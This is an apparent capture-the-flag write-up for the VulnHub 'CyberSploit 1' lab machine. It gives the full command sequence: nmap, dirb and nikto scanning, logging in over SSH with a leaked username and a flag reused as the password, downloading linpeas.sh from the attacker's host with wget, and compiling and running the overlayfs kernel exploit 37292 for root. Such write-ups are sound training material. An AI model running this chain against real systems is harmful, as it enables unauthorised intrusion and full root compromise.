https://www.vulnhub.com/entry/cybersploit-1,506/
It’s it running Ubuntu 12.04 LTS, set use its preset in QEMU
Discover Target IP
sudo nmap -sn 192.168.122.1-255
Scan Ports
nmap -p- 192.168.122.181
nmap -p 22,80 -sC -sV 192.168.122.181
sudo nmap -sU 192.168.122.181
scan top 1000 UDP ports
Port 80
- visit
http://192.168.122.181/robots.txt
- getting
R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
- decoding it from base64, and get Flag 1
Good Work !
Flag1: cybersploit{youtube.com/c/cybersploit}
dirb http://192.168.122.181
nikto -host 192.168.122.181
- if we inspect element
view-source:http://192.168.122.181/
of the home page, we will get a username at line 48
<!-------------username:itsskv--------------------->
Port 22
- we can now use
ssh itsskv@192.168.122.181
, and use passwordcybersploit{youtube.com/c/cybersploit}
from flag one to login into the target machine - get
flag2.txt
fromitsskv
’s home, convert it from binary to text and get Flag 2:
good work !
flag2: cybersploit{https:t.me/cybersploit1}
Explore possible Privilege Escalation possibility
- LinPeas.sh
https://github.com/carlospolop/PEASS-ng
- we can try
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
, but it won’t work as target machine doesn’t have SSL - so we download it onto the attacker’s machine, start a simple server using Python
python3 -m http.server 4444
at port 4444 - after SSH into the target machine,
wget http://192.168.122.181:4444/linpeas.sh
chmod +x linpeas.sh
and then run it
Kernel Exploit - Privilege Escalation
- Becase kernel version is
3.13.0
, it’s quite old, we can search for exploitation online - or
searchsploit linux kernel 3.13.0
overlayfs Local privilege escalation
https://www.exploit-db.com/exploits/37292
- We are going to use
37292
exploit - Download it from the website
- or
searchsploit -m 37292.c
mirror it to our current working directory - compile it using
gcc 37292.c -o 37292
ormake 37292
- just run it on target machine, now we are
root
Getting the Flag
- run
bash
to get a better shell cat /root/finalflag.txt